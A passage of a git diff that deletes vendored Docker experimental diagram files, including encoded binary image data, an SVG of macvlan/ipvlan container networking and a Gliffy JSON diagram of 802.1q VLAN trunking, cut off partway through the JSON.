zJs9~!`s?6@pNL_A6Wl%O@06BA6o=rbO~b%EjxmP}hCoqqR-|_ zr>cCM`X2a5baf8vb8~Gz+QCN>E2);k_?SB;s~qb@$rpC%z$rxBnRK(1_y9n#A zCz*VzEuc_Pbo|-eFjz5ZOh{_9V2=KMCPCnapii}m8g-Y^jJ7x}GxVx=?3b1o4E3I< znrH>vhCjpkE(~-a-Iu}K>D8Je3s{jxJwyDN{0Y%Sbtz;XB+MXesZtt|rJAd~C*6Ho z-NxKAMv0X0hy%-#Q}2DgA#u>N7wQZJ(s6j9-wDL+6ONCSH(B4sSRaB$I~?x1wts~) zkGDi;{s#ee3-nW3LK_f-LvX8}d*pL?6#8Gvu5-Z>gI*$sWRITZq+c%QL?tw5aP0X0 z!&BqKR}Q|Obd1fdhZ;duMAoFsV#^N!ekgs-vcabBzi##5iK zL}9GCcTG!`Slc4pn{RVmw`r_p@kTEcU}j&x@??KYs$Je!sot|G#jD!Qfbg0S?KA#k z$9Go1HR*HKnb_xU6BQ|!jRH2zv!;kcbtwYw$ ze$+TSB-*0A3vR_+zu4=qkTM6`5Cgc?Vu4jsKI-$#d0fxCO^MXy@cG1fxjuF4>m z6!S<({3=7jvd@pfmrfbgf@r*_Vwqke#ardA%Vy0VjD~J6DDnd{S1ULdnZ$*wLO+JZ>1-Ix#p1Jr2he#-T!q!N3^$ zUJe2fRJsZJR%AeN9$%uSZZbx`7^72XtZY(SWFi%XQyIEIKN%Qsx)xwbs7wUsL^Q1v zpi=nbP&y8NOudX>ROIJ!0ah(!D0s!ZSeMMS$qlLOCx=LL06gZbb0uRF1WW25G(}^> 
zp5Y2t`;BSP(%bntPe-X95^n^4`m!1}hsigEO&hgmK6 z&`Ro8_ubx4-3;UYhrLOaB`QTAP{ay-2@C1p*-g?;RoR#ByCwE8gs|GS7V_$ODB`DL z+|;!3FLDB2iIJC!Qjoy5fu2D>A&ko&wOPyem{;z}XHV_JB=i>-zEv)FJRZ-R-56uW z545gHmb)K_2oktDAcsALslbZZr-(B!J9t@+PBoSO@>7S13s?L&iWaLF*x!h7q_;4f zJIbR{d$}b|Lc$xpp5+b?w!*wwz0_dZhAt!v+sW`?JeV4MkczII8dJQwj`eE3>2p4O zpn{rLFnDQ6x3#Qj)$+Oo&EqZwOw?2A(0@ zcAhkIXw+!OGU$IZk1gW1{6=SmEzf|TPGB;b|D zF41;e6fMG{rgD#DzG@F!8KK=N(bAOvGdX;FN>2>FH9!az41IQb-um`tM077kN8F(Z zL^MAVhzx$C2D*U`d}xuVE@^?!1A9MKLNRuHM?q`s2*5%xx&SAilY5#F$Nv_@`IKmp zG(aC_f^4l8ULVp&BB3LNU|LKlzHLn*2a-J+0vd2Mg~+ASk#PR$K4I&OHx`1oN#faz z`*$VoB;y;}k0$bu9nuB~mcwGn1P*+M6cfLGr=ea+f=B+E4^1K=nuXV%Mr;cl_Wbiv z&d6YDw(po{zw6X55sMY#@iKd6lEf!Wn`;7kab*PJD0*o^4d8t3s+9=Hum8DTX3AhA z_06{v%|{N9N{FW#${m&MQoIVOvkV(51eXC#0~LM=5@7u^C6|fz2Jj`kAb(dX_#i27 zGEv_#;O3JaQdc>gh$j(vn7?HF`{f&^J)W!y7D6suwU{C8hfj3S(C<4pMw~-}gYQZ^ zURcu65fH=!M|V~;sq2(F2!jgGl?^q5$N z7RC!Nm?U>bV1RRqKu&_$8-rrXrZm|_MKv;~G$XEkc4xNA^ttN|8m?xZu!mjyVxc!} zeEZo2C;h>CP4_3hH>32dNgKl`5N)ha8C6OTv|X=mWKjUgajgaXYZ3~Q6Y2@f^Wgd? 
zo|&AZAJdrhG?%A-m_@j-8L$d?81^xCLAXzhm`b}v9Ruf)+QT|IyzF_=5?y z=N&=@r0yCij?ilEV0y>W(28Vxp_K_!2fGHC84)1GYU7z*pkc+#Wbs({D6E*B^RMaB zexKss0$w^QwC2&O)%_t`WD3vA^Z(eIPFu(1Q6;bEh-g1RPhxnF(2%5k#Q-qljI=o>a_qYk z<+tmM$tR|f`10+gfIs{}jaq$k*|Il21CKzP=t4;Ug1OtfC`aWe2brsB_3TbweLorr ztC)1^ju>mN!AVKCR33|V`0*$Cf#=e&n1;ik&?eY{Iib4IR*48kTaZU(rD;c4C5ZZZ zTZacIC&w&1!I3h+DER3s?c8J>|1zm)LEsn<9N=p+l9EWL{x$GL2vjN&Jtmfpg^_WC zznrtLo9+vK9RiSWAjF}fAOzhsdyo&*1-zlqvjD$l2mL_54}2p43AD%9T0<@W) z#UGCezvUT+2p;$x+Au|{RMutiUZ^LR*TQ|M2YOo;G1)^t(#LWOG0^E#41e8Q+dG>KHf{j z(&ex6wRRV1VDqAchNU>gyAzRq;Ye{F)Gx+?^uT9PZ~EyKpFABJVY?1~m7Y`FONk%Z zl~znQs~}Jk5XpLW=Abgc3Ayk`w#meW`fdtUx|CiqyMjK|F{!8{MlrSG0paNqRKi`_CEB$gv3l})i{pa#+EtuMxyrJoV?qH2gx z#Fd_6mkmxV8s*S_MZZD@s%PIo3qaXatLN-fb_CzRW_PQ}Bfs}J!A$m2zZhxTn)->L zsHp1|;{Iv~hBL$T_+mfdw%Pmi$=!fhu_{5$@dp_LS=MV9vSib zdk0r2#aFq9@9e|%yU2B;v;OK{vtfc6D(Q!X*&}JkT=|)Jx5g^YUpA<_0!==F_YvSC zhZ%NyH3ZW}@8L-_3ecQ+0ChqO>wO{tMrX}@Oc_WrLO{O~2hb@^f>c~K-oqS}7Uk$U z#EWGQ0p)gVzS0KVCqjoLM3#cwVLwe_&*K)I;XSmQjIjz3wE*OOr~?$4bIkI>JZk$b z6je`e(bCX7P|~cg2yDo@F8}K%dYBogh?({;m>I$d&Q?;i>DP!Ubtu}faaLPUh{@lo zO~FNJiQi&XH7p@CJ1F{6jB|fsew*aSCe+XbNO1tqd6+?Hd3f?cS<%`nO>aNJawh-x z6`ORk;Roh>l!i&FrC&=GDPUpi7&OdcwROM+!wFRzu`8Ibv4d}^hZxA;2rt>O640n% zlAQm8q+_d$nbvu=Hj4SWs)51*^Itv9hhE6`%CcgQ>a3(q|G$oD*g9eqNpmV|yLAv2 z*)E1Ec4w>YbYUZM2QIkwIRDLS$}*9b$_IQoNjK6{Bo&DWQ>0Ab)aUQY7r{{mM1LH$Oj%c$f3R z|39dgc~fFAC-6?OORoi4qN*Vxgc4=h zH5DTuM7ktaxzc)R>$M8qXJV?G1a+ zB0sjDRYae&;f{b-tR)B$3{U+^S`a#x424s2LzRp>Y+x*nj3w*qM=mb>`u}X+kJLyx z)QW~mNo)*JUdX@{$MIRqy0^FYUwdh6^eq1jx)NmbM&~ayj>5J79RX;+p5!qn4bQ6y z#r#Ju`&w_MKdygy`?s2L;XOu?mmp50&ezvidk6PGkk_7=KhAoF*CD6tJtsIb_IFm=?WH7%Ma=0B*ym!dx2?0>78N{O28Bpwzl(6Glg@L?$@6e1h{vf2(&> zfLS^tEIwlVOG7tY<8a%n{Z3KZF>@TXv7NlIMbljec{@?&Bo-$^DNWqOxjhpUS^H@@ z4~%>te!18=rad+@AYT96it|I^Ex+efi{^ZPFS7B~RG6aW)Ji7rr?f&oG=fO{n3qPZ zJv3x%eRMgpR*zLYI&>SK<=mr69(iSvYK8s$FUc& z6hi1M83a5IC^#T^TAP^6h=5HP4u0wx%(?|A6cNP(kA&fQ=a>_bZ&ju#hYMJ2MZ+Ta z=kQrrME4>eT(IOvyw(;>pJN)zo|}mYD5da8dZsG9 
zhsxe`z)PX3Dk)wERe&Df1#Dvq>_(Qe9on_(!M%gOwL&UXyt$D<_+0*s zR0pSzf!inHI`x6m`Um5rWqYpFJ`m-s2()EC7#vw-NwO%%S zqfilAIDIR9t^nG%P|jIDc5=#|-76N`S`|er9~;XV5WDkWLq#b@8BEg1x9W!Sqs_5K zX=`iM*e0y_ic(O_&Eee(Dm;qKW)Q?Qixu)48y9AIwbq4^a70RI@f5HpOXRsEZzH~q zP4Qmj`1q(;u?U!6@IUY$zMOj>=02=i{E(8H&GJKWGG?H5adxAHJ(QUrgcta-;lTtM zRR~k6@>)#hIl~zkk}LO8-6Qg_uG^zszJi&r%8?N$HjaCN5lo3!SHyfQ70=+b# zOxL=>nj&y8X|N(~L?;`##Rn^iN-ptZJQS?c!>8lTGs_+X=dT^5P?n}n+2L#a zUs*jURphV4i|TREJ~Ms1k++gtIk9ajG5$^+t|HIsv>u^5gLUT|p9R>y*ryP_WYu`q zsp}F9+Tpr3HKN1g!RJMZ@nudS7n?38t-ZXAV)`Ri>Pt(nY$Y(+1mgc;$+fvjetR+W zMP_IqI=4Lavlg&LAiN2pvudu*{US2{=Bi6HmI46##PG(ApBA{FhNvPuzzr+Ye(5Bp z_L0@k`;Yg{el>`=KIhtMLE;{o1~K56jI1OovZXti9jb(_;x^TuT@~5;G*9l$MryM11#KG35vk zS8d*DH9pjk%@Q=rEmkhnIX!58nvVm>iBqK#W-5xaN}dn!AJJiCf~9axN;nYqhG=gP zc%}Fgm!~%_zRmj|_PVORyi;Ff7R6!haSbw9Q^TIq73@~(Y=O+?2yufyU?8Il$*X^P z%{^)ywABSH4}GUzm5wTcegzBYo^7LUWglP(O6Mz=DG+FkrqjN6t>xZ*H8HJ;Mbd>l z_-q&4!O&wW=v&8d0^`{Q{SDM<+^xkd{x~@yDC{3F@6tvTq#VWJ2$%LmG6ylERpe^D zxisET>(V3OLq)Qq!iv{wX`|bOLs~iEWOo8xGIWz#$AwT~IUmWw z)peI#IXY*+DdppYxvBrhG!re;d5F?{J^%nW60d_0Bh^mdN)&F7JSW31pqcCsH&8!& zhOZ=6#S6o7;VsAF(zRMX(268A_qxfBd|kM;ZXd1^_X{!Y%^Ms>Ih(>S=7in-eAb@# z^ELrCZ{4$hnY!yL34+;iqoXxkT4DUy1vzvxg?Phb`KE$j_QKC`c#~; zKCpMB@o`1e%Vvw^sZTg56izHBnX~4j{|6UAmAOm|U7#y=nIW@Legy1i7_SJatl08a zk$?1K_l5n*Hy%$Gl81IhM}+Drny|$ilDH)itON+p4vlUR_poRp$>~_kyk@FjDPF@j zICF)Ej7P?xD~sn>@;4fB6bq(qKpxFmLu)QHDAIrE2xXqYr8C=Y(n6K|jhZdlEK$8D zOuxtb+)##;ij4SwWJvpQF5c#X6X^EvXwn1#}Ki0-R-0D zC;$_4aqjQqjG$>p&mOzWK`xa1m|+sJSf4K|<(f3PWta)P%=9SbQwF;u2rq7 zAbx+Q{KKP}X*IO99wIEIE0cnMwgpk`cCS)A#t&-5n9^mOSK{^5kEPU+pwUorG+n8i zEDr*KIbiMJ*C4d5hy53%nNhC^W#}H)y#ZVR)M9ai2J8JDlfO1)6Pwa%Na=l>jPR~D zWN{*vLsbbD4dTsfEGmV3M#B#Le1IOYXL(x2!24ah0wi4l$dMH)e}51&`xQ%(_tfh& z=hfPOrYt*i3XBZ6$8E7dd2HSIomjl@)@s~qgc~P_p1m6jVG|?bj=5*%X#IL67V*O9 zVZsCxlu+AjnRg8nO%no#Y7K9lPK%Xmaq_I2LwBS-nZ{XNYIb$~7-}Zi$F3v0Xk&Za z8?p}5XBw;Fe@wwB7%CY=6C~Kzv%|p9#5S{9OQ9irqHWy`h{?pnMC{x_6Dn8lKCU)o 
z2^89UU)i2LnMV3tE_qNa)4O&Gf1c}K`=M)9HK?SCq!?=iR%cUcsuf2ijz`^(uDkDNi?s-lBIv@iG01iz zm7=VyiKc`~djzZ<)D!kSKu&JVd23;0IaEf88fYH$&<6rML5|+!-z4p>1w&UPVQ;|k zs@J0zQ=a9#Mg7q;>{{txEtygSrzContainer #1eth0172.16.1.10/24Container #2eth0172.16.1.11/24DockerHost #1Container #3eth0172.16.1.12/24Container #4eth0172.16.1.13/24DockerHost #2(Host)eth0172.16.1.253/24(IPOptional)(Host)eth0172.16.1.254/24(IPOptional)NetworkGateway172.16.1.1/24ContainersAttachedDirectlytoParentInterface.NoBridgeUsed (Docker0)MacvlanBridgeMode &IpvlanL2Mode \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy deleted file mode 100644 index 40eed17270..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":389,"height":213,"nodeIndex":276,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":5,"y":6.6999969482421875},"max":{"x":389,"y":212.14285409109937}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":64.0,"y":36.0,"rotation":0.0,"id":216,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-12.0,33.0],[84.0,33.0],[84.0,86.0],[120.0,86.0]],"lockSegme
nts":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":190.0,"y":32.0,"rotation":0.0,"id":254,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#f1c232","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-142.0,16.0],[54.0,16.0],[54.0,115.0],[87.0,115.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":133.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":226,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":15.147567221510933,"y":139.96785409109907,"rotation":0.0,"id":115,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":29,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":116,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":17,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":117,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":26,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"s
tartConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887324033,-1.055138662316466],[1.3318647887324033,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":118,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":119,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.
0,"id":120,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":121,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container1 - vlan10

192.168.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.0,"y":82.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"


","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":4.1999969482421875,"rotation":0.0,"id":187,"width":108.99999999999999,"height":19.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 - 802.1q trunk

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":282.0,"y":8.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":32,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":55.0,"rotation":0.0,"id":210,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-8.0,11.0],[-8.0,34.0],[26.0,34.0],[26.0,57.0]],"lockSegments":{},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":12.805718530101615,"y":11.940280333547719,"rotation":0.0,"id":134,"width":59.31028146989837,"height":83.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":35,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":64.0,"y":73.19999694824219,"rotation":0.0,"id":211,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic
":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.10

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":52.19999694824219,"rotation":0.0,"id":212,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.20

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.386363636363733,"y":108.14285409109937,"rotation":0.0,"id":219,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":139.1475672215109,"y":139.96785409109907,"rotation":0.0,"id":227,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":55,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":228,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":43,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":229,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":52,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":232,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":232,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockS
egments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":230,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":231,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":46,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":232,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":41,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.19934
7471451986,"rotation":0.0,"id":233,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":54,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container2 - vlan20

172.16.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":259.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":248,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":56,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":265.14756722151094,"y":139.96785409109907,"rotation":0.0,"id":241,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":73,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":242,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":61,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":243,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":70,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":246,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[
